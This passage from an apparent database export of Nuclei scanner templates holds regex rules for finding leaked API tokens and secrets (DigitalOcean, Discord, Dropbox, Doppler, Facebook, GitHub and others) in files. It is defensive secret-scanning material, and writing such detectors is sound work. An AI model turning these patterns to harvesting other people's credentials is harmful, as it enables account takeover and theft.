digitalocean-personal-access\n\ninfo:\n name: DigitalOcean Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml\n - 
https://docs.digitalocean.com/reference/api/\n metadata:\n verified: true\n tags: file,keys,digitalocean,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(dop_v1_[a-f0-9]{64})\\b\n# digest: 4a0a00473045022100f146de3e812aa02bc68e6bd8a380bbb31e19020d3b029b7058a43b25a50cd67c02201aaa5c47262abba69de2d0520cab36504880f2eb20785e5c81e7af2d4e20d1bd:922c64590222798bb761d5b6d8e72950", "hash": "15d00735f5ba9ee7eb7f9151c9d6c893", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2b" }, "name": "digitalocean-refresh-token.yaml", "content": "id: digitalocean-refresh-token\n\ninfo:\n name: DigitalOcean Refresh Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml\n - https://docs.digitalocean.com/reference/api/\n metadata:\n verified: true\n tags: file,keys,digitalocean,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(dor_v1_[a-f0-9]{64})\\b\n# digest: 4a0a004730450220402ac7235c9f81afab06065b456d5b16538ef65064d66dc59b93ffe594109f6b022100eceb599d627e574fc31382e8444e8101d779d0480e9a98691a2834a2658e6dff:922c64590222798bb761d5b6d8e72950", "hash": "af12121e5c5b5baaa8816ca4b12ab8e9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2c" }, "name": "discord-api-token.yaml", "content": "id: discord-api-token\n\ninfo:\n name: Discord API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-api-token.go\n metadata:\n verified: true\n tags: file,keys,discord,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:discord)(?:[0-9a-z\\-_\\t 
.]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-f0-9]{64})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a00463044022037733afdc50da25bb9aad70105e098f1202e735dc5444395ce93ab296deaa5e9022067beba9000a0f6beb4c06e8ee726b8da6eb5c318ed497acb539100d2c07dee3b:922c64590222798bb761d5b6d8e72950", "hash": "4ac35699a989774945595eb07057bd92", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2d" }, "name": "discord-cilent-secret.yaml", "content": "id: discord-client-secret\n\ninfo:\n name: Discord Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-secret.go\n metadata:\n verified: true\n tags: file,keys,discord,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:discord)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9=_\\-]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a004730450220062ecfed26d7eb92b1d368f4f782bed33d615438b7c4b3a871d9f1091303a4fe0221009c6cea2becc2a92e0c9f93c543c62d968c6867ed5e09974db976775127e0979e:922c64590222798bb761d5b6d8e72950", "hash": "f33705d579564f9385a6a5ba8e6510cb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2e" }, "name": "discord-client-id.yaml", "content": "id: discord-client-id\n\ninfo:\n name: Discord Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/discord-client-id.go\n metadata:\n verified: true\n tags: file,keys,discord,token\n\nfile:\n - extensions:\n - all\n\n 
extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:discord)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([0-9]{18})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a0047304502200d273d5de14ba14f6ffb36950cef0703e6397c3b39ce626788b05c5175646176022100b31634e39d09a01921856286b8498ec9d340d32e9b39c2a70878fc034bbf8499:922c64590222798bb761d5b6d8e72950", "hash": "45777083b0d638ba1d4b2c92c077548f", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2f" }, "name": "dockerhub-pat.yaml", "content": "id: dockerhub-pat\n\ninfo:\n name: Docker Hub Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dockerhub.yml\n - https://docs.docker.com/security/for-developers/access-tokens/\n metadata:\n verified: true\n tags: docker,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dckr_pat_[a-zA-Z0-9_-]{27})(?:$|[^a-zA-Z0-9_-])\n# digest: 4a0a00473045022100bc73fcf69453af6d917f363d99e57d06620e6b40f1e38b54ac72982c1aff0865022030218f700bce4f88878c34d596fcc3563ee6a6a0f233055703455751caaabd08:922c64590222798bb761d5b6d8e72950", "hash": "be6bcc12b58145be6426a10cdd0280a1", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d30" }, "name": "doppler-audit.yaml", "content": "id: doppler-audit\n\ninfo:\n name: Doppler Audit Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.audit\\.[a-zA-Z0-9]{40,44})\\b\n# 
digest: 490a00463044022047f3853a49b38bfc41c3a21edae871fa20dbc00c3e4fec75a443da4c802ce4e702205fce2aa010ee24edfbc190aad5475ba28a4ea42e81476b2e36a2eb95de8c4479:922c64590222798bb761d5b6d8e72950", "hash": "6ea9b51b81cce6d2e942d70fee8da510", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d31" }, "name": "doppler-cli.yaml", "content": "id: doppler-cli\n\ninfo:\n name: Doppler CLI Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.ct\\.[a-zA-Z0-9]{40,44})\\b\n# digest: 4b0a00483046022100de413ad22bea43d8292d3d22ed07b2d5c6a06bfb4819104c20eeb9134f913be2022100d2915ad20b135f4f8d477c1acec455af6c749833455e09d2542c0e849ab3fc7b:922c64590222798bb761d5b6d8e72950", "hash": "d1ae45c46d3f5924fcc57efca5b2cd59", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d32" }, "name": "doppler-scim.yaml", "content": "id: doppler-scim\n\ninfo:\n name: Doppler SCIM Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.scim\\.[a-zA-Z0-9]{40,44})\\b\n# digest: 4a0a00473045022010274194b3725b6ef14112e5fc7f4e0d5c60123a51583f044bf2e94b76077001022100a0caa7739f04c145ec8ee920c613f38a6b5befd04918931bd0ee39cfdbcf3a44:922c64590222798bb761d5b6d8e72950", "hash": 
"5cfdfc811e8b5a582dc45d2206e78b40", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d33" }, "name": "doppler-service-account.yaml", "content": "id: doppler-service-account\n\ninfo:\n name: Doppler Service Account Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.sa\\.[a-zA-Z0-9]{40,44})\\b\n# digest: 4a0a00473045022100c8177f1a0244e794af08cc9615e65a415d8cb7dc3616acc9f779e61aab518eb002204d63814164c93815807eb87c0919830977be1d4f878bd1697b90644de744894c:922c64590222798bb761d5b6d8e72950", "hash": "25fa69079635d6ecb1a1873a2099e2bb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d34" }, "name": "doppler-service.yaml", "content": "id: doppler-service\n\ninfo:\n name: Doppler Service\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/doppler.yml\n - https://docs.doppler.com/reference/api\n - https://docs.doppler.com/reference/auth-token-formats\n metadata:\n verified: true\n tags: doppler,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(dp\\.st\\.(?:[a-z0-9\\-_]{2,35}\\.)?[a-zA-Z0-9]{40,44})\\b\n# digest: 4a0a00473045022100b61969103e1649c2c330814280aea5b020d5f47ca55c9601d0647af01c47ddbf02200698f545c2217332324593dffcc44a82bccb5ec45faf31507c356b71ee4ad7cf:922c64590222798bb761d5b6d8e72950", "hash": "9cf148f81b106ae3fc64749f0fc5d249", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d35" }, "name": "dropbox-access.yaml", "content": 
"id: dropbox-access\n\ninfo:\n name: Dropbox Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dropbox.yml\n - https://developers.dropbox.com/oauth-guide\n - https://www.dropbox.com/developers/\n - https://www.dropbox.com/developers/documentation/http/documentation\n metadata:\n verified: true\n tags: dropbox,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(sl\\.[a-zA-Z0-9_-]{130,152})(?:$|[^a-zA-Z0-9_-])\n# digest: 490a0046304402203d0305c1997e320e30d2d0ad0460beb9c8478986a0f1b75f621167a79f8ca17302206da5b41a7402312c0d16fc2665349e3caf8aac3cee677a34f34089d739a743c6:922c64590222798bb761d5b6d8e72950", "hash": "223f5eb11624b72cdcbfbc1e899dc106", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d36" }, "name": "dropbox-api-token.yaml", "content": "id: dropbox-api-token\n\ninfo:\n name: Dropbox API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-api-token.go\n metadata:\n verified: true\n tags: file,keys,dropbox,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:dropbox)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{15})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100e195768a79de92a350e9ebbad15bac8d585c15a3990f36e0090992948eba7f0002203a3094d187586339c95b773f2a4c5f68f4dcc23bcebea94b0e590dc3751053b7:922c64590222798bb761d5b6d8e72950", "hash": "8f94a7a93325d5829b822016f7c5a148", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d37" }, "name": "dropbox-longlived-token.yaml", 
"content": "id: dropbox-longlived-token\n\ninfo:\n name: Dropbox Long Lived API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-long-lived-api-token.go\n metadata:\n verified: true\n tags: file,keys,dropbox,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:dropbox)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{11}(AAAAAAAAAA)[a-z0-9\\-_=]{43})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a004730450220600b28a10ce8749e2bf39b10f83a1b0e1da1bd3319d054a1915a49db90f28393022100fe4ded4b3701ce5f48ce8bebadec45469a6b81359de76e161f40b3a29a4acdc1:922c64590222798bb761d5b6d8e72950", "hash": "121db606987114bf77b67688fb66e856", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d38" }, "name": "dropbox-shortlived-token.yaml", "content": "id: dropbox-shortlived-token\n\ninfo:\n name: Dropbox Short Lived API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/dropbox-short-lived-api-token.go\n metadata:\n verified: true\n tags: file,keys,dropbox,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:dropbox)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}(sl\\.[a-z0-9\\-=_]{135})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 
490a00463044022033ed532c958e77394bb29e2e0d62c753914de655409ff23f7baed5576027a5770220052af03c0f1363b4acc54b0a01da4503325c089caaf4f74410db82d91dbf5f28:922c64590222798bb761d5b6d8e72950", "hash": "fd0f319f18aaecff4c79247dc82d14ee", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d39" }, "name": "easypost-api-token.yaml", "content": "id: easypost-api-token\n\ninfo:\n name: Easypost API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml\n metadata:\n verified: true\n tags: file,keys,easypost,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - EZAK(?i)[a-z0-9]{54}\n# digest: 4b0a00483046022100e61496ecd8994a3249bfa7ced4fdb49d6518b2b47fc556b3e611abeecd64c2c1022100c69eb40905d2e780d9e2a07b44b0a0956cbfc868c0b9e46c93421e26a73b9c21:922c64590222798bb761d5b6d8e72950", "hash": "4f2ae5a77c0f581c6b7e970e6ccc3407", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3a" }, "name": "easypost-test-token.yaml", "content": "id: easypost-test-token\n\ninfo:\n name: Easypost Test API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml\n metadata:\n verified: true\n tags: file,keys,easypost,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - EZTK(?i)[a-z0-9]{54}\n# digest: 4b0a00483046022100a8a903d8c12982d4215d7d686683821b3a72ee119e106b1c62de92ea9e2e8891022100dda07ef96999d284589a8ab9524c24512ac4e4be6190717fd70fb0837e99b08d:922c64590222798bb761d5b6d8e72950", "hash": 
"6cbb05b08bec26ee85ef5f611d7ab7f8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3b" }, "name": "facebook-api-token.yaml", "content": "id: facebook-api-token\n\ninfo:\n name: Facebook API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go\n metadata:\n verified: true\n tags: keys,file,facebook,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:facebook)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-f0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022039cfc3385a5e54130639427498934edb6851cbbfa0cb2fa9e0766c80de9c2f06022100a24d18ff30e17c296e32f42a80fee23cf4ae78eb0e82b85e1b399663945788f7:922c64590222798bb761d5b6d8e72950", "hash": "747ff3749c7b65cbeb92c569d22453ad", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3c" }, "name": "facebook-client-id.yaml", "content": "id: facebook-client-id\n\ninfo:\n name: Facebook Client ID - Detect\n author: gaurang\n severity: info\n description: Facebook client ID token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: keys,file,token,facebook\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)(facebook|fb)(.{0,20})?['\\\"][0-9]{13,17}['\\\"]\"\n\n# Enhanced by md on 2023/05/04\n# digest: 490a0046304402205c3ed81a6b30472131610c16c17b09e837f4a50a24ea7855646cd4f63681693102206d187a7c8a35d1a8a6d44bc7ffb3df51f06401d98e210d0f0233744e5cf0496b:922c64590222798bb761d5b6d8e72950", "hash": "fc50858c8643236b8f752c96f7af9802", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3d" 
}, "name": "facebook-secret.yaml", "content": "id: facebook-secret-key\n\ninfo:\n name: Facebook Secret Key - Detect\n author: gaurang\n severity: low\n description: Facebook secret key token was detected.\n tags: keys,file,token,facebook\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(?i)(facebook|fb)(.{0,20})?(?-i)['\\\"][0-9a-f]{32}['\\\"]\"\n# digest: 490a004630440220088a4482a94c06fc1c8f203f3c7c1bb1c49303682b030f8012e682c9b0b1a4d6022069258d660c85e0daa2e6406090f1d54b78ac348fbb963c372d123327433408ee:922c64590222798bb761d5b6d8e72950", "hash": "f21d793475d01ba8c23e29d74364b093", "level": 3, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3e" }, "name": "fb-access-token.yaml", "content": "id: fb-access-token\n\ninfo:\n name: Facebook Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/facebook.yml\n - https://developers.facebook.com/docs/facebook-login/access-tokens/\n metadata:\n verified: true\n tags: file,keys,facebook,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(EAACEdEose0cBA[a-zA-Z0-9]+)\\b'\n# digest: 4b0a00483046022100906343469fb8f96da3ccf0963909ce5c20670bdff9d3b67347567d8983225e880221008bae64c94e2bbd5ae50d2d96d011e27e00695b52e82a7be86533132940bd8095:922c64590222798bb761d5b6d8e72950", "hash": "c08de9324cc4eaf04ff6e11931187d8d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d3f" }, "name": "finicity-api-token.yaml", "content": "id: finicity-api-token\n\ninfo:\n name: Finicity API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go\n metadata:\n verified: true\n tags: 
file,keys,finicity,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:finicity)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-f0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100f241e2b7819d9662106d68984ceab12ce6488feefc724d94bc7a131c814f1bc3022100d335261dd3b17fa626f653da06a0287f63003626693e3a6ae7dc137786af7a13:922c64590222798bb761d5b6d8e72950", "hash": "502f14164431d4b10cfe9a64d306103a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d40" }, "name": "finicity-client-secret.yaml", "content": "id: finicity-client-secret\n\ninfo:\n name: Finicity Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go\n metadata:\n verified: true\n tags: file,keys,finicity,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:finicity)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{20})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a004730450220654a1f5a3e4adeca05a57c66008b411228a269685dc3c0029b8f81a6199cf45e022100ef719245aad660e2cd86603013a99c42ea967eeb6626760cc0c33070b7e54f81:922c64590222798bb761d5b6d8e72950", "hash": "fcd73f2612a318673635aaf3947396e4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d41" }, "name": "flutterwave-encryption-key.yaml", "content": "id: flutterwave-encryption-key\n\ninfo:\n name: Flutterwave Encryption Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.yaml\n - 
https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-encryption-key.go\n metadata:\n verified: true\n tags: flutter,file,keys,flutterwave\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - FLWSECK_TEST-(?i)[a-h0-9]{12}\n\n# digest: 490a00463044022001bb728280f64a65aad5cf17534d751dbe1cda89c68bb06251a2232fe7ca0810022037d2fb62e03bd86162102d5d381a0c5a6c54728628a5381af1eeaac926773f91:922c64590222798bb761d5b6d8e72950\n", "hash": "7bd709da3b9f58edd29672c90836d72d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d42" }, "name": "flutterwave-public-key.yaml", "content": "id: flutterwave-public-key\n\ninfo:\n name: Flutterwave Public Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-public-key.yaml\n metadata:\n verified: true\n tags: flutter,file,keys,flutterwave\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - FLWPUBK_TEST-(?i)[a-h0-9]{32}-X\n\n# digest: 4a0a0047304502201663f48cdd3af7e4e844c938a840b398231226cf267ce2b9b71aee64b4f01b070221009b15d106d4003dba20c9c1de1a7531478ba5abe063299fa31fad81343c1b8e07:922c64590222798bb761d5b6d8e72950\n", "hash": "3dc7fb6c8b9a97c457940c9c5b656015", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d43" }, "name": "flutterwave-secret-key.yaml", "content": "id: flutterwave-secret-key\n\ninfo:\n name: Flutterwave Secret Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/flutterwave-secret-key.go\n metadata:\n verified: true\n 
tags: flutter,file,keys,flutterwave\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - FLWSECK_TEST-(?i)[a-h0-9]{32}-X\n\n# digest: 4a0a00473045022100ef800d5ff9a0070b05c95c26fea14222a4efb0739951eea468e07f08ccef665a022008c000020cb1a4316a03521c4fd6d3af85de85340d924cff0d0936b80b1ed85f:922c64590222798bb761d5b6d8e72950\n", "hash": "968a77a0bb5de2ebb9f9997512a0c6d6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d44" }, "name": "github-app-token.yaml", "content": "id: github-app-token\n\ninfo:\n name: Github App Token\n author: tanq16,DhiyaneshDK\n severity: medium\n tags: keys,file,token,github\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"\\b((?:ghu|ghs)_[a-zA-Z0-9]{36})\\b\"\n# digest: 4b0a00483046022100b9d3d1fd11451fe2d5bb3cc0d433ee22cae5ca24e86f5b60845cb3103ad053fe0221009741eb11789fe97cedd0f7fb821d82fa102bb7b65a4f00a99e9c3f2792cb8306:922c64590222798bb761d5b6d8e72950", "hash": "51d63b76271487be88f01587c781ce19", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d45" }, "name": "github-oauth-token.yaml", "content": "id: github-oauth-token\n\ninfo:\n name: Github OAuth Access Token\n author: tanq16\n severity: high\n tags: file,keys,token,github\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"gho_.{36}\"\n# digest: 4a0a004730450221008c53926b33a3b4059610c1a3fea1979833257a4acc6a7b3f42f1be341cd326320220284a515e5b905b6e7eb5cfba9858b243614aaceaf6da411d2e1cd9368de769fe:922c64590222798bb761d5b6d8e72950", "hash": "7d9f5e91fd46fc407eeecce71c1fd97f", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d46" }, "name": "github-outdated-key.yaml", "content": "id: github-outdated-key\n\ninfo:\n name: GitHub Outdated RSA SSH Host key\n author: naglis\n severity: info\n description: |\n At approximately 05:00 UTC on March 24, out of an abundance of caution, we replaced our RSA 
SSH host key used to secure Git operations for GitHub.com.\n reference:\n - https://github.blog/2023-03-23-we-updated-our-rsa-ssh-host-key/\n - https://web.archive.org/web/20230316194229/https://docs.github.com/en/enterprise-cloud@latest/authentication/keeping-your-account-and-data-secure/githubs-ssh-key-fingerprints\n metadata:\n verified: true\n tags: file,keys,github,ssh,rsa\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - SHA256:nThbg6kXUpJWGl7E1IGOCspRomTxdCARLviKw6E5SY8\n - ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAq2A7hRGmdnm9tUDbO9IDSwBK6TbQa\\+PXYPCPy6rbTrTtw7PHkccKrpp0yVhp5HdEIcKr6pLlVDBfOLX9QUsyCOV0wzfjIJNlGEYsdlLJizHhbn2mUjvSAHQqZETYP81eFzLQNnPHt4EVVUh7VfDESU84KezmD5QlWpXLmvU31/yMf\\+Se8xhHTvKSCZIFImWwoG6mbUoWf9nzpIoaSjB\\+weqqUUmpaaasXVal72J\\+UX2B\\+2RPW3RcT0eOzQgqlJL3RKrTJvdsjE3JEAvGq3lGHSZXy28G3skua2SmVi/w4yCE6gbODqnTWlg7\\+wC604ydGXA8VJiS5ap43JXiUFFAaQ==\n# digest: 